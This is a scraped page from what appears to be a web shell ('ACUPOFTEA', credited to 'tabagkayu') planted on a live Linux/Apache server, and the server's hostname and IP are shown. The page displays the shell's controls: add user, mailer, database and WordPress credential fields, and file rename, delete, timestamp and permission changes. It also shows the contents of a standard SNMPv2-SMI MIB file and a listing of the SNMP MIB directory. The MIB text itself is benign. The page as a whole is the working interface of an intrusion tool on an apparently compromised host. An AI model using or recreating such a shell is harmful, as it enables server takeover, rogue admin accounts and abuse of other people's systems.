System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
share
/
snmp
/
mibs
/
216.73.216.49
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
SNMPv2-SMI.txt
SNMPv2-SMI DEFINITIONS ::= BEGIN -- the path to the root org OBJECT IDENTIFIER ::= { iso 3 } -- "iso" = 1 dod OBJECT IDENTIFIER ::= { org 6 } internet OBJECT IDENTIFIER ::= { dod 1 } directory OBJECT IDENTIFIER ::= { internet 1 } mgmt OBJECT IDENTIFIER ::= { internet 2 } mib-2 OBJECT IDENTIFIER ::= { mgmt 1 } transmission OBJECT IDENTIFIER ::= { mib-2 10 } experimental OBJECT IDENTIFIER ::= { internet 3 } private OBJECT IDENTIFIER ::= { internet 4 } enterprises OBJECT IDENTIFIER ::= { private 1 } security OBJECT IDENTIFIER ::= { internet 5 } snmpV2 OBJECT IDENTIFIER ::= { internet 6 } -- transport domains snmpDomains OBJECT IDENTIFIER ::= { snmpV2 1 } -- transport proxies snmpProxys OBJECT IDENTIFIER ::= { snmpV2 2 } -- module identities snmpModules OBJECT IDENTIFIER ::= { snmpV2 3 } -- Extended UTCTime, to allow dates with four-digit years -- (Note that this definition of ExtUTCTime is not to be IMPORTed -- by MIB modules.) ExtUTCTime ::= OCTET STRING(SIZE(11 | 13)) -- format is YYMMDDHHMMZ or YYYYMMDDHHMMZ -- where: YY - last two digits of year (only years -- between 1900-1999) -- YYYY - last four digits of the year (any year) -- MM - month (01 through 12) -- DD - day of month (01 through 31) -- HH - hours (00 through 23) -- MM - minutes (00 through 59) -- Z - denotes GMT (the ASCII character Z) -- -- For example, "9502192015Z" and "199502192015Z" represent -- 8:15pm GMT on 19 February 1995. Years after 1999 must use -- the four digit year format. Years 1900-1999 may use the -- two or four digit format. -- definitions for information modules MODULE-IDENTITY MACRO ::= BEGIN TYPE NOTATION ::= "LAST-UPDATED" value(Update ExtUTCTime) "ORGANIZATION" Text "CONTACT-INFO" Text "DESCRIPTION" Text RevisionPart VALUE NOTATION ::= value(VALUE OBJECT IDENTIFIER) RevisionPart ::= Revisions | empty Revisions ::= Revision | Revisions Revision Revision ::= "REVISION" value(Update ExtUTCTime) "DESCRIPTION" Text -- a character string as defined in section 3.1.1 Text ::= value(IA5String) END OBJECT-IDENTITY MACRO ::= BEGIN TYPE NOTATION ::= "STATUS" Status "DESCRIPTION" Text ReferPart VALUE NOTATION ::= value(VALUE OBJECT IDENTIFIER) Status ::= "current" | "deprecated" | "obsolete" ReferPart ::= "REFERENCE" Text | empty -- a character string as defined in section 3.1.1 Text ::= value(IA5String) END -- names of objects -- (Note that these definitions of ObjectName and NotificationName -- are not to be IMPORTed by MIB modules.) ObjectName ::= OBJECT IDENTIFIER NotificationName ::= OBJECT IDENTIFIER -- syntax of objects -- the "base types" defined here are: -- 3 built-in ASN.1 types: INTEGER, OCTET STRING, OBJECT IDENTIFIER -- 8 application-defined types: Integer32, IpAddress, Counter32, -- Gauge32, Unsigned32, TimeTicks, Opaque, and Counter64 ObjectSyntax ::= CHOICE { simple SimpleSyntax, -- note that SEQUENCEs for conceptual tables and -- rows are not mentioned here... application-wide ApplicationSyntax } -- built-in ASN.1 types SimpleSyntax ::= CHOICE { -- INTEGERs with a more restrictive range -- may also be used integer-value -- includes Integer32 INTEGER (-2147483648..2147483647), -- OCTET STRINGs with a more restrictive size -- may also be used string-value OCTET STRING (SIZE (0..65535)), objectID-value OBJECT IDENTIFIER } -- indistinguishable from INTEGER, but never needs more than -- 32-bits for a two's complement representation Integer32 ::= INTEGER (-2147483648..2147483647) -- application-wide types ApplicationSyntax ::= CHOICE { ipAddress-value IpAddress, counter-value Counter32, timeticks-value TimeTicks, arbitrary-value Opaque, big-counter-value Counter64, unsigned-integer-value -- includes Gauge32 Unsigned32 } -- in network-byte order -- (this is a tagged type for historical reasons) IpAddress ::= [APPLICATION 0] IMPLICIT OCTET STRING (SIZE (4)) -- this wraps Counter32 ::= [APPLICATION 1] IMPLICIT INTEGER (0..4294967295) -- this doesn't wrap Gauge32 ::= [APPLICATION 2] IMPLICIT INTEGER (0..4294967295) -- an unsigned 32-bit quantity -- indistinguishable from Gauge32 Unsigned32 ::= [APPLICATION 2] IMPLICIT INTEGER (0..4294967295) -- hundredths of seconds since an epoch TimeTicks ::= [APPLICATION 3] IMPLICIT INTEGER (0..4294967295) -- for backward-compatibility only Opaque ::= [APPLICATION 4] IMPLICIT OCTET STRING -- for counters that wrap in less than one hour with only 32 bits Counter64 ::= [APPLICATION 6] IMPLICIT INTEGER (0..18446744073709551615) -- definition for objects OBJECT-TYPE MACRO ::= BEGIN TYPE NOTATION ::= "SYNTAX" Syntax UnitsPart "MAX-ACCESS" Access "STATUS" Status "DESCRIPTION" Text ReferPart IndexPart DefValPart VALUE NOTATION ::= value(VALUE ObjectName) Syntax ::= -- Must be one of the following: -- a base type (or its refinement), -- a textual convention (or its refinement), or -- a BITS pseudo-type type | "BITS" "{" NamedBits "}" NamedBits ::= NamedBit | NamedBits "," NamedBit NamedBit ::= identifier "(" number ")" -- number is nonnegative UnitsPart ::= "UNITS" Text | empty Access ::= "not-accessible" | "accessible-for-notify" | "read-only" | "read-write" | "read-create" Status ::= "current" | "deprecated" | "obsolete" ReferPart ::= "REFERENCE" Text | empty IndexPart ::= "INDEX" "{" IndexTypes "}" | "AUGMENTS" "{" Entry "}" | empty IndexTypes ::= IndexType | IndexTypes "," IndexType IndexType ::= "IMPLIED" Index | Index Index ::= -- use the SYNTAX value of the -- correspondent OBJECT-TYPE invocation value(ObjectName) Entry ::= -- use the INDEX value of the -- correspondent OBJECT-TYPE invocation value(ObjectName) DefValPart ::= "DEFVAL" "{" Defvalue "}" | empty Defvalue ::= -- must be valid for the type specified in -- SYNTAX clause of same OBJECT-TYPE macro value(ObjectSyntax) | "{" BitsValue "}" BitsValue ::= BitNames | empty BitNames ::= BitName | BitNames "," BitName BitName ::= identifier -- a character string as defined in section 3.1.1 Text ::= value(IA5String) END -- definitions for notifications NOTIFICATION-TYPE MACRO ::= BEGIN TYPE NOTATION ::= ObjectsPart "STATUS" Status "DESCRIPTION" Text ReferPart VALUE NOTATION ::= value(VALUE NotificationName) ObjectsPart ::= "OBJECTS" "{" Objects "}" | empty Objects ::= Object | Objects "," Object Object ::= value(ObjectName) Status ::= "current" | "deprecated" | "obsolete" ReferPart ::= "REFERENCE" Text | empty -- a character string as defined in section 3.1.1 Text ::= value(IA5String) END -- definitions of administrative identifiers zeroDotZero OBJECT-IDENTITY STATUS current DESCRIPTION "A value used for null identifiers." ::= { 0 0 } END
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-10-09 10:58:21
..
DIR
-
drwxr-xr-x
2025-10-07 09:19:26
AGENTX-MIB.txt
text/plain
17.05 KB
-rw-r--r--
2025-10-07 09:19:25
BRIDGE-MIB.txt
text/plain
49.75 KB
-rw-r--r--
2025-10-07 09:19:25
DISMAN-EVENT-MIB.txt
text/plain
66.51 KB
-rw-r--r--
2025-10-07 09:19:25
DISMAN-SCHEDULE-MIB.txt
text/plain
24.04 KB
-rw-r--r--
2025-10-07 09:19:25
DISMAN-SCRIPT-MIB.txt
text/plain
62.8 KB
-rw-r--r--
2025-10-07 09:19:25
EtherLike-MIB.txt
text/plain
82.51 KB
-rw-r--r--
2025-10-07 09:19:25
HCNUM-TC.txt
text/plain
4.55 KB
-rw-r--r--
2025-10-07 09:19:25
HOST-RESOURCES-MIB.txt
text/plain
51.31 KB
-rw-r--r--
2025-10-07 09:19:25
HOST-RESOURCES-TYPES.txt
text/plain
10.33 KB
-rw-r--r--
2025-10-07 09:19:25
IANA-ADDRESS-FAMILY-NUMBERS-MIB.txt
text/plain
6.56 KB
-rw-r--r--
2025-10-07 09:19:25
IANA-LANGUAGE-MIB.txt
text/plain
4.28 KB
-rw-r--r--
2025-10-07 09:19:25
IANA-RTPROTO-MIB.txt
text/plain
4 KB
-rw-r--r--
2025-10-07 09:19:25
IANAifType-MIB.txt
text/plain
34.55 KB
-rw-r--r--
2025-10-07 09:19:25
IF-INVERTED-STACK-MIB.txt
text/plain
4.95 KB
-rw-r--r--
2025-10-07 09:19:25
IF-MIB.txt
text/plain
70.01 KB
-rw-r--r--
2025-10-07 09:19:25
INET-ADDRESS-MIB.txt
text/plain
16.39 KB
-rw-r--r--
2025-10-07 09:19:25
IP-FORWARD-MIB.txt
text/plain
45.2 KB
-rw-r--r--
2025-10-07 09:19:25
IP-MIB.txt
text/plain
181.32 KB
-rw-r--r--
2025-10-07 09:19:25
IPV6-FLOW-LABEL-MIB.txt
text/plain
1.98 KB
-rw-r--r--
2025-10-07 09:19:25
IPV6-ICMP-MIB.txt
text/plain
20.56 KB
-rw-r--r--
2025-10-07 09:19:25
IPV6-MIB.txt
text/plain
55.14 KB
-rw-r--r--
2025-10-07 09:19:25
IPV6-TC.txt
text/plain
3.08 KB
-rw-r--r--
2025-10-07 09:19:25
IPV6-TCP-MIB.txt
text/plain
8.65 KB
-rw-r--r--
2025-10-07 09:19:25
IPV6-UDP-MIB.txt
text/plain
5.56 KB
-rw-r--r--
2025-10-07 09:19:25
LM-SENSORS-MIB.txt
text/plain
5.79 KB
-rw-r--r--
2025-10-07 09:19:25
MTA-MIB.txt
text/plain
41.38 KB
-rw-r--r--
2025-10-07 09:19:25
NET-SNMP-AGENT-MIB.txt
text/plain
15.53 KB
-rw-r--r--
2025-10-07 09:19:25
NET-SNMP-EXAMPLES-MIB.txt
text/plain
8.95 KB
-rw-r--r--
2025-10-07 09:19:25
NET-SNMP-EXTEND-MIB.txt
text/plain
9.11 KB
-rw-r--r--
2025-10-07 09:19:25
NET-SNMP-MIB.txt
text/plain
1.99 KB
-rw-r--r--
2025-10-07 09:19:25
NET-SNMP-PASS-MIB.txt
text/plain
3.64 KB
-rw-r--r--
2025-10-07 09:19:25
NET-SNMP-TC.txt
text/plain
4.7 KB
-rw-r--r--
2025-10-07 09:19:25
NET-SNMP-VACM-MIB.txt
text/plain
4.92 KB
-rw-r--r--
2025-10-07 09:19:25
NETWORK-SERVICES-MIB.txt
text/plain
20.51 KB
-rw-r--r--
2025-10-07 09:19:25
NOTIFICATION-LOG-MIB.txt
text/plain
24.12 KB
-rw-r--r--
2025-10-07 09:19:25
RFC-1215.txt
text/plain
1.15 KB
-rw-r--r--
2025-10-07 09:19:24
RFC1155-SMI.txt
text/plain
3 KB
-rw-r--r--
2025-10-07 09:19:24
RFC1213-MIB.txt
text/plain
77.8 KB
-rw-r--r--
2025-10-07 09:19:24
RMON-MIB.txt
text/plain
144.36 KB
-rw-r--r--
2025-10-07 09:19:25
SCTP-MIB.txt
text/plain
44.26 KB
-rw-r--r--
2025-10-07 09:19:25
SMUX-MIB.txt
text/plain
4.54 KB
-rw-r--r--
2025-10-07 09:19:25
SNMP-COMMUNITY-MIB.txt
text/plain
15.13 KB
-rw-r--r--
2025-10-07 09:19:25
SNMP-FRAMEWORK-MIB.txt
text/plain
21.82 KB
-rw-r--r--
2025-10-07 09:19:25
SNMP-MPD-MIB.txt
text/plain
5.37 KB
-rw-r--r--
2025-10-07 09:19:25
SNMP-NOTIFICATION-MIB.txt
text/plain
19.54 KB
-rw-r--r--
2025-10-07 09:19:25
SNMP-PROXY-MIB.txt
text/plain
8.89 KB
-rw-r--r--
2025-10-07 09:19:25
SNMP-TARGET-MIB.txt
text/plain
22.24 KB
-rw-r--r--
2025-10-07 09:19:25
SNMP-TLS-TM-MIB.txt
text/plain
42.9 KB
-rw-r--r--
2025-10-07 09:19:25
SNMP-TSM-MIB.txt
text/plain
8.7 KB
-rw-r--r--
2025-10-07 09:19:25
SNMP-USER-BASED-SM-MIB.txt
text/plain
38.28 KB
-rw-r--r--
2025-10-07 09:19:25
SNMP-USM-AES-MIB.txt
text/plain
2.15 KB
-rw-r--r--
2025-10-07 09:19:25
SNMP-USM-DH-OBJECTS-MIB.txt
text/plain
20.61 KB
-rw-r--r--
2025-10-07 09:19:25
SNMP-USM-HMAC-SHA2-MIB.txt
text/plain
4.3 KB
-rw-r--r--
2025-10-07 09:19:25
SNMP-VIEW-BASED-ACM-MIB.txt
text/plain
33.36 KB
-rw-r--r--
2025-10-07 09:19:25
SNMPv2-CONF.txt
text/plain
8.07 KB
-rw-r--r--
2025-10-07 09:19:24
SNMPv2-MIB.txt
text/plain
28.62 KB
-rw-r--r--
2025-10-07 09:19:25
SNMPv2-SMI.txt
text/plain
8.71 KB
-rw-r--r--
2025-10-07 09:19:25
SNMPv2-TC.txt
text/plain
37.14 KB
-rw-r--r--
2025-10-07 09:19:25
SNMPv2-TM.txt
text/plain
5.64 KB
-rw-r--r--
2025-10-07 09:19:25
TCP-MIB.txt
text/plain
27.89 KB
-rw-r--r--
2025-10-07 09:19:25
TRANSPORT-ADDRESS-MIB.txt
text/plain
16.03 KB
-rw-r--r--
2025-10-07 09:19:25
TUNNEL-MIB.txt
text/plain
27.17 KB
-rw-r--r--
2025-10-07 09:19:25
UCD-DEMO-MIB.txt
text/plain
2.11 KB
-rw-r--r--
2025-10-07 09:19:25
UCD-DISKIO-MIB.txt
text/plain
4.85 KB
-rw-r--r--
2025-10-07 09:19:25
UCD-DLMOD-MIB.txt
text/plain
3.01 KB
-rw-r--r--
2025-10-07 09:19:25
UCD-IPFWACC-MIB.txt
text/plain
7.93 KB
-rw-r--r--
2025-10-07 09:19:25
UCD-SNMP-MIB.txt
text/plain
52.09 KB
-rw-r--r--
2025-10-07 09:19:25
UDP-MIB.txt
text/plain
20.39 KB
-rw-r--r--
2025-10-07 09:19:25
~ ACUPOFTEA - mail.ontime-ae.com